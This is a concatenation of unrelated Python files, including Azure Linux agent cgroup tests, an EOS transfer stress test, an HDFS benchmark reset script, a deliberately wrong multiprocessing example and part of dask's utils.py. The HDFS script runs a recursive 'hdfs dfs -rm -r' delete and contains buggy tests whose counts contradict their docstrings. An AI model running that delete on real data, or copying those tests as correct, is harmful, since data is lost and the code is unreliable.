ca_cert="auth_serv/ca.pem", phase2="autheap=GTC",
wait_connect=False, scan_freq="2412")
dev[0].wait_disconnected()
dev[0].request("REMOVE_NETWORK all")
|
test_cgroupconfigurator.py
|
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.4+ and Openssl 1.0+
#
from __future__ import print_function
import os
import random
import re
import subprocess
import tempfile
import time
import threading
from azurelinuxagent.common.cgroup import CGroup
from azurelinuxagent.common.cgroupconfigurator import CGroupConfigurator, UnexpectedProcessesInCGroupException
from azurelinuxagent.common.cgroupstelemetry import CGroupsTelemetry
from azurelinuxagent.common.exception import CGroupsException
from azurelinuxagent.common.utils import shellutil
from tests.common.mock_cgroup_commands import mock_cgroup_commands
from tests.tools import AgentTestCase, patch, mock_sleep
from tests.utils.miscellaneous_tools import format_processes, wait_for
class CGroupConfiguratorSystemdTestCase(AgentTestCase):
@classmethod
def tearDownClass(cls):
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._instance from unit test for CGroupConfigurator
CGroupConfigurator._instance = None # pylint: disable=protected-access
AgentTestCase.tearDownClass()
@staticmethod
def _get_new_cgroup_configurator_instance(initialize=True, mock_commands=None, mock_files=None):
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._instance from unit test for CGroupConfigurator
CGroupConfigurator._instance = None # pylint: disable=protected-access
configurator = CGroupConfigurator.get_instance()
CGroupsTelemetry.reset()
if initialize:
with mock_cgroup_commands() as mocks:
if mock_files is not None:
for item in mock_files:
mocks.add_file(item[0], item[1])
if mock_commands is not None:
for command in mock_commands:
mocks.add_command(command[0], command[1])
configurator.initialize()
return configurator
def test_initialize_should_start_tracking_the_agent_cgroups(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertTrue(configurator.enabled(), "Cgroups should be enabled")
self.assertTrue(any(cg for cg in tracked if cg.name == 'walinuxagent.service' and 'cpu' in cg.path),
"The Agent's CPU is not being tracked. Tracked: {0}".format(tracked))
self.assertTrue(any(cg for cg in tracked if cg.name == 'walinuxagent.service' and 'memory' in cg.path),
"The Agent's memory is not being tracked. Tracked: {0}".format(tracked))
def test_initialize_should_start_tracking_other_controllers_when_one_is_not_present(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance(
mock_commands=[(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')])
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertTrue(configurator.enabled(), "Cgroups should be enabled")
self.assertFalse(any(cg for cg in tracked if cg.name == 'walinuxagent.service' and 'cpu' in cg.path),
"The Agent's CPU should not be tracked. Tracked: {0}".format(tracked))
self.assertTrue(any(cg for cg in tracked if cg.name == 'walinuxagent.service' and 'memory' in cg.path),
"The Agent's memory is not being tracked. Tracked: {0}".format(tracked))
def test_initialize_should_not_enable_cgroups_is_the_cpu_and_memory_controllers_are_not_present(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance(
mock_commands=[(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')])
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertFalse(configurator.enabled(), "Cgroups should not be enabled")
self.assertEqual(len(tracked), 0, "No cgroups should be tracked. Tracked: {0}".format(tracked))
def test_initialize_should_not_enable_cgroups_when_the_agent_is_not_in_the_system_slice(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance(
mock_commands=[(r"^mount -t cgroup$",
'''cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,name=systemd)
cgroup on /sys/fs/cgroup/rdma type cgroup (rw,nosuid,nodev,noexec,relatime,rdma)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
''')])
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertFalse(configurator.enabled(), "Cgroups should not be enabled")
self.assertEqual(len(tracked), 0, "No cgroups should be tracked. Tracked: {0}".format(tracked))
def test_enable_and_disable_should_change_the_enabled_state_of_cgroups(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
self.assertTrue(configurator.enabled(), "CGroupConfigurator should be enabled by default")
configurator.disable()
self.assertFalse(configurator.enabled(), "disable() should disable the CGroupConfigurator")
configurator.enable()
self.assertTrue(configurator.enabled(), "enable() should enable the CGroupConfigurator")
def test_enable_should_raise_cgroups_exception_when_cgroups_are_not_supported(self):
with patch("azurelinuxagent.common.cgroupapi.CGroupsApi.cgroups_supported", return_value=False):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance(initialize=False)
configurator.initialize()
with self.assertRaises(CGroupsException) as context_manager:
configurator.enable()
self.assertIn("Attempted to enable cgroups, but they are not supported on the current platform", str(context_manager.exception))
def test_disable_should_reset_tracked_cgroups(self):
# Start tracking a couple of dummy cgroups
CGroupsTelemetry.track_cgroup(CGroup("dummy", "/sys/fs/cgroup/memory/system.slice/dummy.service", "cpu"))
CGroupsTelemetry.track_cgroup(CGroup("dummy", "/sys/fs/cgroup/memory/system.slice/dummy.service", "memory"))
CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance().disable()
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
self.assertEqual(len(CGroupsTelemetry._tracked), 0) # pylint: disable=protected-access
def test_cgroup_operations_should_not_invoke_the_cgroup_api_when_cgroups_are_not_enabled(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
configurator.disable()
# List of operations to test, and the functions to mock used in order to do verifications
operations = [
[configurator.create_extensions_slice, "azurelinuxagent.common.cgroupapi.SystemdCgroupsApi.create_extensions_slice"],
]
for operation in operations:
with patch(operation[1]) as mock_cgroup_api_operation:
operation[0]()
self.assertEqual(mock_cgroup_api_operation.call_count, 0)
def test_cgroup_operations_should_log_a_warning_when_the_cgroup_api_raises_an_exception(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
# cleanup_legacy_cgroups disables cgroups on error, so make disable() a no-op
with patch.object(configurator, "disable"):
# List of operations to test, and the functions to mock in order to raise exceptions
operations = [
[configurator.create_extensions_slice, "azurelinuxagent.common.cgroupapi.SystemdCgroupsApi.create_extensions_slice"],
]
def raise_exception(*_):
raise Exception("A TEST EXCEPTION")
for operation in operations:
with patch("azurelinuxagent.common.cgroupconfigurator.logger.warn") as mock_logger_warn:
with patch(operation[1], raise_exception):
operation[0]()
self.assertEqual(mock_logger_warn.call_count, 1)
args, _ = mock_logger_warn.call_args
message = args[0]
self.assertIn("A TEST EXCEPTION", message)
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_not_use_systemd_when_cgroups_are_not_enabled(self, _):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
configurator.disable()
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as patcher:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="date",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
command_calls = [args[0] for args, _ in patcher.call_args_list if len(args) > 0 and "date" in args[0]]
self.assertEqual(len(command_calls), 1, "The test command should have been called exactly once [{0}]".format(command_calls))
self.assertNotIn("systemd-run", command_calls[0], "The command should not have been invoked using systemd")
self.assertEqual(command_calls[0], "date", "The command line should not have been modified")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_use_systemd_run_when_cgroups_are_enabled(self, _):
with mock_cgroup_commands():
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance().start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="the-test-extension-command",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
command_calls = [args[0] for (args, _) in popen_patch.call_args_list if "the-test-extension-command" in args[0]]
self.assertEqual(len(command_calls), 1, "The test command should have been called exactly once [{0}]".format(command_calls))
self.assertIn("systemd-run --unit=Microsoft.Compute.TestExtension_1.2.3", command_calls[0], "The extension should have been invoked using systemd")
@patch('time.sleep', side_effect=lambda _: mock_sleep())
def test_start_extension_command_should_start_tracking_the_extension_cgroups(self, _):
# CPU usage is initialized when we begin tracking a CPU cgroup; since this test does not retrieve the
# CPU usage, there is no need for initialization
with mock_cgroup_commands():
CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance().start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="test command",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# protected-access<W0212> Disabled: OK to access CGroupConfigurator._tracked from unit test for CGroupConfigurator
tracked = CGroupsTelemetry._tracked # pylint: disable=protected-access
self.assertTrue(
any(cg for cg in tracked if cg.name == 'Microsoft.Compute.TestExtension-1.2.3' and 'cpu' in cg.path),
"The extension's CPU is not being tracked")
self.assertTrue(
any(cg for cg in tracked if cg.name == 'Microsoft.Compute.TestExtension-1.2.3' and 'memory' in cg.path),
"The extension's memory is not being tracked")
def test_start_extension_command_should_raise_an_exception_when_the_command_cannot_be_started(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
original_popen = subprocess.Popen
def mock_popen(command_arg, *args, **kwargs):
if "test command" in command_arg:
raise Exception("A TEST EXCEPTION")
return original_popen(command_arg, *args, **kwargs)
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
with self.assertRaises(Exception) as context_manager:
configurator.start_extension_command(
extension_name="Microsoft.Compute.TestExtension-1.2.3",
command="test command",
timeout=300,
shell=False,
cwd=self.tmp_dir,
env={},
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertIn("A TEST EXCEPTION", str(context_manager.exception))
def test_check_processes_in_agent_cgroup_should_raise_when_there_are_unexpected_processes_in_the_agent_cgroup(self):
configurator = CGroupConfiguratorSystemdTestCase._get_new_cgroup_configurator_instance()
# The test script recursively creates a given number of descendant processes, then it blocks until the
# 'stop_file' exists. It produces an output file containing the PID of each descendant process.
test_script = os.path.join(self.tmp_dir, "create_processes.sh")
stop_file = os.path.join(self.tmp_dir, "create_processes.stop")
AgentTestCase.create_script(test_script, """
#!/usr/bin/env bash
set -euo pipefail
if [[ $# != 2 ]]; then
echo "Usage: $0 <output_file> <count>"
exit 1
fi
echo $$ >> $1
if [[ $2 > 1 ]]; then
$0 $1 $(($2 - 1))
else
timeout 30s /usr/bin/env bash -c "while ! [[ -f {0} ]]; do sleep 0.25s; done"
fi
exit 0
""".format(stop_file))
number_of_descendants = 3
def wait_for_processes(processes_file):
def _all_present():
if os.path.exists(processes_file):
with open(processes_file, "r") as file_stream:
_all_present.processes = [int(process) for process in file_stream.read().split()]
return len(_all_present.processes) >= number_of_descendants
_all_present.processes = []
if not wait_for(_all_present):
raise Exception("Timeout waiting for processes. Expected {0}; got: {1}".format(
number_of_descendants, format_processes(_all_present.processes)))
return _all_present.processes
threads = []
try:
#
# Start the processes that will be used by the test. We use two sets of processes: the first set simulates a command executed by the agent
# (e.g. iptables) and its child processes, if any. The second set of processes simulates an extension.
#
agent_command_output = os.path.join(self.tmp_dir, "agent_command.pids")
agent_command = threading.Thread(target=lambda: shellutil.run_command([test_script, agent_command_output, str(number_of_descendants)]))
agent_command.start()
threads.append(agent_command)
agent_command_processes = wait_for_processes(agent_command_output)
extension_output = os.path.join(self.tmp_dir, "extension.pids")
def start_extension():
original_sleep = time.sleep
original_popen = subprocess.Popen
# Extensions are stated using systemd-run; mock Popen to remove the call to systemd-run; the test script creates a couple of
# child processes, which would simulate the extension's processes.
def mock_popen(command, *args, **kwargs):
match = re.match(r"^systemd-run --unit=[^\s]+ --scope (.+)", command)
is_systemd_run = match is not None
if is_systemd_run:
command = match.group(1)
process = original_popen(command, *args, **kwargs)
if is_systemd_run:
start_extension.systemd_run_pid = process.pid
return process
with patch('time.sleep', side_effect=lambda _: original_sleep(0.1)): # start_extension_command has a small delay; skip it
with patch("azurelinuxagent.common.cgroupapi.subprocess.Popen", side_effect=mock_popen):
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stdout:
with tempfile.TemporaryFile(dir=self.tmp_dir, mode="w+b") as stderr:
configurator.start_extension_command(
extension_name="TestExtension",
command="{0} {1} {2}".format(test_script, extension_output, number_of_descendants),
timeout=30,
shell=True,
cwd=self.tmp_dir,
env={},
stdout=stdout,
stderr=stderr)
start_extension.systemd_run_pid = None
extension = threading.Thread(target=start_extension)
extension.start()
threads.append(extension)
extension_processes = wait_for_processes(extension_output)
#
# check_processes_in_agent_cgroup uses shellutil and the cgroups api to get the commands that are currently running;
# wait for all the processes to show up
#
# len-as-condition: Do not use `len(SEQUENCE)` to determine if a sequence is empty - Disabled: explicit check improves readability
# protected-access: Access to a protected member _cgroups_api of a client class - Disabled: OK to access protected member in this unit test
if not wait_for(lambda: len(shellutil.get_running_commands()) > 0 and len(configurator._cgroups_api.get_systemd_run_commands()) > 0): # pylint:disable=len-as-condition,protected-access
raise Exception("Timeout while attempting to track the child commands")
#
# Verify that check_processes_in_agent_cgroup raises when there are unexpected processes in the agent's cgroup.
#
# For the agent's processes, we use the current process and its parent (in the actual agent these would be the daemon and the extension
# handler), and the commands started by the agent.
#
# For other processes, we use process 1, a process that already completed, and an extension. Note that extensions are started using
# systemd-run and the process for that commands belongs to the agent's cgroup but the processes for the extension should be in a
# different cgroup
#
def get_completed_process():
random.seed()
completed = random.randint(1000, 10000)
while os.path.exists("/proc/{0}".format(completed)): # ensure we do not use an existing process
completed = random.randint(1000, 10000)
return completed
agent_processes = [os.getppid(), os.getpid()] + agent_command_processes + [start_extension.systemd_run_pid]
other_processes = [1, get_completed_process()] + extension_processes
with patch("azurelinuxagent.common.cgroupconfigurator.CGroupsApi.get_processes_in_cgroup", return_value=agent_processes + other_processes):
with self.assertRaises(UnexpectedProcessesInCGroupException) as context_manager:
CGroupConfigurator.get_instance().check_processes_in_agent_cgroup()
reported = context_manager.exception.unexpected
self.assertEqual(
len(other_processes), len(reported),
"An incorrect number of processes was reported. Expected: {0} Got: {1}".format(format_processes(other_processes), reported))
for pid in other_processes:
self.assertTrue(
any(reported_process.startswith("[PID: {0}]".format(pid)) for reported_process in reported),
"Process {0} was not reported. Got: {1}".format(format_processes([pid]), reported))
#
# And now verify that it does not raise when only the expected processes are in the cgroup
#
error = None
try:
with patch("azurelinuxagent.common.cgroupconfigurator.CGroupsApi.get_processes_in_cgroup", return_value=agent_processes):
CGroupConfigurator.get_instance().check_processes_in_agent_cgroup()
except UnexpectedProcessesInCGroupException as exception:
error = exception
# we fail outside the except clause, otherwise the failure is reported as "During handling of the above exception, another exception occurred:..."
if error is not None:
self.fail("The check of the agent's cgroup should not have reported errors. Reported processes: {0}".format(error.unexpected))
finally:
# create the file that stops the test process and wait for them to complete
open(stop_file, "w").close()
for thread in threads:
thread.join(timeout=5)
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eosio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eosio, stakedDeposit=0, waitForTransBlock=True, exitOnError=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="eosio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission eosio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransInBlock(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransInBlock(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
reset_env.py
|
import unittest
from util import *
from threading import Thread
FILE_SIZE = 1024 * 1024
def test_create_100M_0KB_thread(max_number):
cids = []
dir_name = TEST_DIR + random_string()
# 500 dirs
for j in range(max_number):
# each has 200K files
cid = create_file(dir_name + "/" + str(j), 0)
cids.append(cid)
wait_for_cmdlets(cids)
class ResetEnv(unittest.TestCase):
def test_delete_all_rules(self):
"""
delete all rules
"""
rules = list_rule()
for rule in rules:
# Delete all rules
if rule['state'] != 'DELETED':
delete_rule(rule['id'])
rules = [r for rule in list_rule() if rule['state'] != 'DELETED']
self.assertTrue(len(rules) == 0)
def test_delete_all_files(self):
try:
subprocess.call("hdfs dfs -rm -r " + TEST_DIR, shell=True)
subprocess.call("hdfs dfs -mkdir " + TEST_DIR, shell=True)
except OSError:
print "HDFS Envs is not configured!"
def test_create_1M_DFSIO(self):
"""
Using DFSIO to generte 10M files.
Each time generate 100K * 2 files (100K io_data and 100K io_control)
"""
dir_number = 50
dfsio_cmd = "hadoop jar $HADOOP_HOME/share/hadoop/mapreduce" + \
"/hadoop-mapreduce-client-jobclient-*-tests.jar TestDFSIO " + \
"-write -nrFiles 10000 -fileSize 0KB"
for i in range(dir_number):
subprocess.call(dfsio_cmd, shell=True)
# subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_control " +
# TEST_DIR + str(i) + "_control", shell=True)
subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_data " +
TEST_DIR + str(i) + "_data", shell=True)
def test_create_10M_DFSIO(self):
"""
Using DFSIO to generte 10M files.
Each time generate 100K * 2 files (100K io_data and 100K io_control)
"""
dir_number = 500
dfsio_cmd = "hadoop jar $HADOOP_HOME/share/hadoop/mapreduce" + \
"/hadoop-mapreduce-client-jobclient-*-tests.jar TestDFSIO " + \
"-write -nrFiles 10000 -fileSize 0KB"
for i in range(dir_number):
subprocess.call(dfsio_cmd)
# subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_control " +
# TEST_DIR + str(i) + "_control")
subprocess.call("hdfs dfs -mv /benchmarks/TestDFSIO/io_data " +
TEST_DIR + str(i) + "_data")
def test_create_10K_0KB_DFSIO_parallel(self):
dir_num = 50
for i in range(dir_num):
file_index = 0
dir_name = TEST_DIR + random_string()
command_arr = []
subprocess.call("hdfs dfs -mkdir " + dir_name)
for i in range(10000 / dir_num):
command_arr.append("hdfs dfs -touchz " +
dir_name + "/" + str(file_index))
file_index += 1
exec_commands(command_arr)
def test_create_100M_0KB_parallel(self):
max_number = 200000
dir_number = 50
for i in range(dir_number):
t = Thread(target=test_create_100M_0KB_thread, args=(max_number,))
t.start()
def test_create_100M_0KB(self):
"""
Create 100M=500K * 200 files in /ssmtest/.
Files will be kept in dir named from 1 to 200.
Files are named from 0-499999.
"""
max_number = 500000
dir_number = 200
for i in range(dir_number):
cids = []
dir_name = TEST_DIR + str(i)
# 200 dirs
for j in range(max_number):
# each has 500K files
cid = create_file(dir_name + "/" + str(j), 0)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_500K_0KB(self):
"""
Create 500K files in /ssmtest/.
All files will be kept in one dir with random name.
Files are named from 0-499999.
"""
max_number = 500000
cids = []
dir_name = TEST_DIR + random_string()
for i in range(max_number):
# each has 500K files
cid = create_file(dir_name + "/" + str(i), 0)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_10000_1MB(self):
"""
Create 10000 * 1 MB files in /1MB/
"""
max_number = 10000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE, "/1MB/")
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_10000_10MB(self):
"""
Create 10000 * 10 MB files in /10MB/
"""
max_number = 10000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE, "/10MB/")
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_1000_100MB(self):
"""
Create 1000 * 100 MB files in /100MB/
"""
max_number = 1000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE, "/100MB/")
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_files_10000(self):
"""
Create 10000 * 1 MB files in /ssmtest/
"""
max_number = 10000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE)
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_files_1000(self):
"""
Create 1000 * 1 MB files in /ssmtest/
"""
max_number = 10000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE)
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
def test_create_files_100(self):
"""
Create 100 * 1 MB files in /ssmtest/
"""
max_number = 10000
file_paths = []
cids = []
for i in range(max_number):
# 1 MB files
file_path, cid = create_random_file_parallel(FILE_SIZE)
file_paths.append(file_path)
cids.append(cid)
wait_for_cmdlets(cids)
if __name__ == '__main__':
requests.adapters.DEFAULT_RETRIES = 5
s = requests.session()
s.keep_alive = False
unittest.main()
|
06_wrong_again.py
|
import multiprocessing
import time
start = time.perf_counter()
def schlafen(n_sec=1):
print(f"Sleep for {n_sec}(s) ...")
time.sleep(n_sec)
print(f"Done sleeping {n_sec}(s) ...")
n_processes = 40
for _ in range(n_processes):
p = multiprocessing.Process(target=schlafen)
p.start()
p.join()
finish = time.perf_counter()
print(f"Master finished in {round(finish-start, 2)}(s)")
# Can you imagine what would happen when you run this script?
|
utils.py
|
from __future__ import print_function, division, absolute_import
import atexit
from collections import deque
from contextlib import contextmanager
from datetime import timedelta
import functools
from hashlib import md5
import inspect
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = '__no_default__'
def _initialize_mp_context():
if PY3 and not sys.platform.startswith('win') and 'PyPy' not in sys.version:
method = dask.config.get('distributed.worker.multiprocessing-method')
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ['distributed']
if 'pkg_resources' in sys.modules:
preload.append('pkg_resources')
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, 'func'):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
warnings.warn("Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s"
% (host, default, e), RuntimeWarning)
return default
finally:
sock.close()
def get_ip(host='8.8.8.8', port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
